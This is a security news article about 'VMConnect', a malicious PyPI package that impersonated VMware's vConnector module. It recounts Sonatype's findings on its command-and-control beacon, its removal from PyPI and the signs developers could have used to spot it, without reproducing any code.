IT professionals were targeted by a malicious package named “VMConnect,” which impersonated the VMware vSphere connector module “vConnector” and was uploaded to the Python Package Index (PyPI).
Fake VMware vConnector package
Based on research conducted by Sonatype and BleepingComputer correspondent Ax Sharma, VMware vSphere is a virtualization toolset, and vConnector is a Python module used by developers and system administrators. vConnector typically receives around 40,000 downloads per month on PyPI.
On July 28, 2023, a malicious package was uploaded to PyPI, impersonating vConnector. By the time it was detected and removed on August 1, 2023, the malicious package had been downloaded 237 times.
The researchers have named this campaign “PaperPin.
During their analysis, Sonatype’s researchers faced a challenge as the second-stage payload from the attacker-controlled URL had already been removed, which hindered further investigation.
Nevertheless, the package’s intent was unmistakable—it was designed to function as a beacon, connecting to a Command & Control server, and subsequently downloading and executing malicious payloads.
“Although the second-stage payload was not available for analysis during the research, the malicious intent behind this package is evidently clear,” said Lamba.
“The decoded base64 string seems to act as a beacon that communicates with a Command & Control server. Once installed on an unsuspecting user’s machine, the package would repeatedly beacon out to an external IP address, downloading and executing malicious payloads at regular intervals.”
Sonatype promptly reported the malicious PyPI packages to the registry administrators and the packages were taken down. The researchers also attempted to contact the user “hushki502,” the username associated with the counterfeit package on both GitHub and PyPI, but received no response.
However, developers could have detected the illicit activity only if they had observed the low number of downloads, detected concealed code within certain files, and identified package names that bore similarities to legitimate projects but were not exact matches.